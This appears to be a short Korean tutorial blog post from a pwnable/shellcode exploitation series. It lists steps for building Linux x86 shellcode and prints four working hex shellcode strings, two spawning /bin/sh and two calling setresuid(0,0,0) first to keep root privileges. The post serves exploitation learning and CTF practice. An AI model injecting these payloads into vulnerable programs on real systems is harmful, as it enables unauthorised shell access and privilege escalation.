02.Basic & Change permissions Shellcode

Pwnable Exploitation/01.Shellcode

by RACC8N 2020. 5. 4. 11:32

* Basic Shellcode ("/bin/sh")

[C language]

Create execve /bin/sh shellcode

1. Check system call number : execve

2. Assembly code

3. Build & Run

* Change permissions shellcode (seteuid + "/bin/sh")

[C language]

1. Check system call number : setresuid

2. Assembly code

3. Build & Run

- Shellcode에 추가된 "setresuid(0,0,0)" 코드에 의해 프로세스의 uid가 root로 복구되었다.

- Basic Shellcode

execve("/bin//sh",["/bin//sh",NULL],[NULL]), length : 26

\x6a\x0b\x58\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80

- Smaller Basic Shellcode

execve("/bin//sh",NULL,NULL), length : 22

\x6a\x0b\x58\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xca\xcd\x80

- Change permissions Shellcode

setresuid(0,0,0) + execve("/bin//sh",["/bin//sh",NULL],[NULL]), length : 35

\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80

- Smaller Change permissions Shellcode

setresuid(0,0,0) + execve("/bin//sh",NULL,NULL) length : 29

\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80

REF: https://www.lazenca.net/pages/viewpage.action?pageId=12190056

02.Create a shellcode that executes "/bin/sh" - TechNote - Lazenca.0x0

Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C language Shell 을 생성하려면 시스템 콜을 해서 "/bin/sh" 프로그램을 실행해야 합니다.아래와 같이 C 언어에서는 "/bin/s

www.lazenca.net